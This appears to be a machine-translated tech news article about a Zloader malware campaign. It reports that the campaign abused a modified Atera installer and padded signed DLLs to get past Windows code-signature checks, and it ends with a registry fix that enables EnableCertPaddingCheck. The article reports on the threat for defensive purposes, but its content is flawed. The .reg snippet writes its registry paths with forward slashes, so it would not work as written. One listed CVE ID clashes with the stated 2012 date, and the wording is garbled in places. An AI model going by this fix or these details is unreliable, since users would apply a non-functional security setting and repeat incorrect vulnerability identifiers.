Home
Tech info
Technology
Science
Life
Application
Electric
Program
Mobile
Windows 10
Windows 11Microsoft's source code signature control system is easily bypassed by Zloader malware
According to security research firm Check Point, a hacker group called MalSmoke launched a Zloader malware infection campaign in November 2021. Up to now, this campaign is still going on and growing in scale.
It is worth noting that the malware is capable of bypassing Microsoft's source code signature checking system. It then deployed malware packages and to date has stolen the personal information of thousands of victims from 111 countries.
Zloader (also known as Terdot or DELoader) is a banking malware first discovered in 2015. It can steal account information and a lot of other private information from infected systems.
Recently, Zloader has also been used to spread other types of malicious code including ransomware such as Ryuk and Egregor.
Microsoft's source code signature control system is easily bypassed by Zloader malware Picture 1
Abuse of Atera . remote management software
In the most recent campaign, Zloader infected by distributing the Java.msi file as a modified Atera installer.
Atera is an enterprise remote monitoring and management software widely used in the IT field. As a result, anti-virus tools do not warn victims even if the installer has been modified.
It is not clear how the hacker managed to trick the victim into downloading the malicious file. However, they are more likely to be distributed through crack software or email scams.
Once launched, the malicious code will provide remote access to the system to the hacker. From there, the hacker can execute scripts and upload or download files.
Microsoft's source code digital signature checking system has been bypassed
The remarkable thing about this tool is that Microsoft's code signature checking system has been bypassed. Check Point experts confirmed that the appContast.dll file with the Zloader installation and registry modification task contains a valid source code signature. Therefore, the operating system trusts and allows it to execute normally.
Comparing the repaired DLL file with the original Atera DLL, the experts found minor modifications in the checksum and signature size. However, these changes are too small to invalidate the signature but enough to append data to the signature portion of the file.
Microsoft has known about this vulnerability since 2012 and assigned it tracking codes CVE-2020-1599, CVE-2013-3900, and CVE-2021-0151. The company is also trying to release increasingly strict file verification policies. However, for some reason they are still disabled by default.
You can enable strict Microsoft policies by taking the following steps:
- Open Notepad
- Copy the following lines of code into Notepad:
Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE/Software/Microsoft/Cryptography/Wintrust/Config] "EnableCertPaddingCheck"="1" [HKEY_LOCAL_MACHINE/Software/Wow6432Node/Microsoft/Cryptography/Wintrust/Config] "EnableCertPaddingCheck"="1"
- Save the Notepad file as a .reg . file
- Double-click the saved file to run it
As of January 2, 2022, the latest Zloader campaign has hit 2,170 different systems.
David PacYou should read it
- Microsoft dismantled the ZLoader botnet, naming key members as a deterrent
- Discover a new kind of malicious code that can record the phone call to extort money
- Warning: The new Facebook virus, a malicious code that is spreading rapidly through Messenger
- Threats and risks from malware on USB Flash
- Warning: New malicious code is infecting about 500,000 router devices
- Malware sneaks into iOS through Apple's official distribution channels
- 14 games on the App Store contain malicious code, iPhone users be careful
- Find bug in Emotet malware, prevent it from spreading for 6 months
- 10 million Android devices are preinstalled with malicious code from the factory
- Hackers break into chats on Microsoft Teams to spread malware
- Fileless malware - Achilles heel of traditional antivirus software
- Researchers create malware based on artificial intelligence
Maybe you are interested
Security solution
Detecting a series of vulnerabilities can help hackers disable metal detectors at airports- How to block Windows Defender from sending data to Microsoft
- How to check if a URL is safe?
- This is how Windows 11 and Windows 10 21H2 combat PrintNightmare, ransomware and other threats
- Patches of dangerous vulnerabilities being exploited by hackers contain dangerous holes and then continue to be exploited by hackers
- Microsoft patches vulnerability in Windows AppX Installer being used to spread Emotet malware
Detecting a series of vulnerabilities can help hackers disable metal detectors at airports
How to block Windows Defender from sending data to Microsoft
How to check if a URL is safe?
This is how Windows 11 and Windows 10 21H2 combat PrintNightmare, ransomware and other threats
Patches of dangerous vulnerabilities being exploited by hackers contain dangerous holes and then continue to be exploited by hackers
Microsoft patches vulnerability in Windows AppX Installer being used to spread Emotet malware